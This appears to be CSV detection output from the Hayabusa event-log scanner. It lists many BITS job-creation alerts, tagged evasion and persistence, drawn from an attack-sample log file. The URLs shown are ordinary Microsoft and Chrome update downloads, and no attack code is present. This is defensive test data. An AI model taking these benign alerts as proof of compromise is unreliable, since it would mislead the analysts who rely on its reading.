2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: 
http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 
20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx 2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
